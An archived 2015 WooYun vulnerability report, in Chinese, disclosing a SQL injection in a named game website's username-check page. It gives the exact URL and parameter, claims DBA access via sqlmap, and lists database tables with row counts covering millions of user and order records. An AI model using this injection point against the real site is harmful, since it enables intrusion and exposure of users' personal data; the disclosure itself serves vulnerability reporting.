乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-10-03: 细节已通知厂商并且等待厂商处理中 2015-10-13: 厂商已经主动忽略漏洞,细节向公众公开
紫金岛游戏主站root权限SQL注入200w用户信息千万用户订单信息泄露
注入点:http://www.91zjd.com/checkusername.aspx?name=name参数加单引号直接报错,如图:
sqlmap截图:
当前数据库信息:
DBA权限:
数据库信息dbo.UserMemberOrder | 10342305 为1000w用户订单信息dbo.View_Userinfo_ME | 2172389 为200w+用户信息
Database: QPGameUserDB+----------------------------------+---------+| Table | Entries |+----------------------------------+---------+| dbo.View_UserALLLogo_bySpid | 116799666| dbo.View_UserALLLogo_bySpid | 116799666| dbo.UserMemberOrder | 10342305| dbo.View_UserFristLogo | 7304127 || dbo.View_VWUserFristLogo | 7200557 || dbo.View_UserLogoNew | 7010453 || dbo.View_UserLogoNew | 7010453 || dbo.GoldEggsLog2012 | 3307940 || dbo.View_Userinfo_ME | 2172389 || dbo.IndividualDatumScore | 2142378 || dbo.GoldEggsLog20110 | 540730 || dbo.GoldEggsLog20110 | 540730 || dbo.GoldEggsLog20110 | 540730 || dbo.Yjt_accounts | 500000 || dbo.View_CZK_TG | 357304 || dbo.Rechargeable_Card_TEST | 356249 || dbo.Rechargeable_Card_TEST | 356249 || dbo.DailyLogonPrize | 307370 || dbo.ShortUrlLink | 178294 || dbo.accountsinfo20110101 | 117381 || dbo.QQcdkey | 99694 || dbo.IndividualDatumFirend | 78305 || dbo.AccountsInfo0821 | 76835 || dbo.AccountsInfo_temp1 | 54253 || dbo.AccountsInfo_temp1 | 54253 || dbo.View_Rechargeable_Card_tg | 14130 || dbo.AccountsInfo_emailbak | 11156 || dbo.AccountsInfo_emailbak | 11156 || dbo.GameIdentifier | 10001 || dbo.UserWincountlogo | 8250 || dbo.iphonetemp1 | 6195 || dbo.iphonetemp1 | 6195 || dbo.iphonetemp2 | 4774 || dbo.AccountsInfo1121 | 4569 || dbo.dxuserall | 3148 || dbo.dxuserall | 3148 || dbo.GameUserBang_TYBLogo | 2358 || dbo.SystemStreamInfo | 2325 || dbo.AccountsInfo_regtj | 2253 || dbo.View_AccountsInfo_regtjNew | 2253 || dbo.View_AccountsInfo_regtjNew | 2253 || dbo.tempUsername | 2079 || dbo.dxUserbak | 1651 || dbo.GameUserBang_abestLogo | 1465 || dbo.GameUserBang_abest_view | 748 || dbo.GameUserBang_abest_view | 748 || dbo.AccountsInfobak | 736 || dbo.IndividualDatumbak | 550 || dbo.IndividualDatumbak | 550 || dbo.PK_SOURCE_IP_POOL | 541 || dbo.LuckUser | 393 || dbo.AccountsInfo_xt | 352 || dbo.UserAddScoreLogo | 325 || dbo.VW_Charge_List | 300 || dbo.dxuserlist | 209 || dbo.S3_Tmp | 156 || dbo.GameUserBang_New_tyb | 93 || dbo.GameUserBang_TYB_WEEKLY_view | 93 || dbo.GameUserBang_TYB_WEEKLY_view | 93 || dbo.View_t1 | 47 || dbo.test_0801 | 46 || dbo.tempcity | 41 || dbo.we | 35 || dbo.View_t320 | 29 || dbo.comd_list | 26 || dbo.ConfineContent | 26 || dbo.D99_CMD | 24 || dbo.D99_Tmp | 22 || dbo.PK_GameDownloadCount | 19 || dbo.View_t500 | 17 || dbo.View_t310 | 14 || dbo.ConfineAddress | 3 || dbo.PK_WebPage_Click_Count | 3 || dbo.SystemStatusInfo | 2 || dbo.D99_REG | 1 || dbo.DIY_TEMPCOMMAND_TABLE | 1 |+----------------------------------+---------+
危害等级:无影响厂商忽略
忽略时间:2015-10-13 09:00
漏洞Rank:20 (WooYun评价)
暂无
